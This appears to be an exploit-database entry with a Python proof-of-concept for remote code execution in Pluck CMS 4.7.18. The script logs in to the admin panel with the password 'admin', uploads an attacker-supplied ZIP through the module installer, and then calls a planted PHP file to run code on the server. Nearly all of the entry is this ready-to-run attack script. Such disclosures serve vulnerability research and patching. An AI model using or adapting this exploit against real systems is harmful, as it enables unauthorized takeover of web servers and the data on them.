Pluck v4.7.18 Remote Code Execution (RCE)

2023.07.15
Credit: Mirabbas Ağalarov
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#Exploit Title: Pluck v4.7.18 - Remote Code Execution (RCE) #Application: pluck #Version: 4.7.18 #Bugs: RCE #Technology: PHP #Vendor URL: https://github.com/pluck-cms/pluck #Software Link: https://github.com/pluck-cms/pluck #Date of found: 10-07-2023 #Author: Mirabbas Ağalarov #Tested on: Linux import requests from requests_toolbelt.multipart.encoder import MultipartEncoder login_url = "http://localhost/pluck/login.php" upload_url = "http://localhost/pluck/admin.php?action=installmodule" headers = {"Referer": login_url,} login_payload = {"cont1": "admin","bogus": "","submit": "Log in"} file_path = input("ZIP file path: ") multipart_data = MultipartEncoder( fields={ "sendfile": ("mirabbas.zip", open(file_path, "rb"), "application/zip"), "submit": "Upload" } ) session = requests.Session() login_response = session.post(login_url, headers=headers, data=login_payload) if login_response.status_code == 200: print("Login account") upload_headers = { "Referer": upload_url, "Content-Type": multipart_data.content_type } upload_response = session.post(upload_url, headers=upload_headers, data=multipart_data) if upload_response.status_code == 200: print("ZIP file download.") else: print("ZIP file download error. Response code:", upload_response.status_code) else: print("Login problem. response code:", login_response.status_code) rce_url="http://localhost/pluck/data/modules/mirabbas/miri.php" rce=requests.get(rce_url) print(rce.text)


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top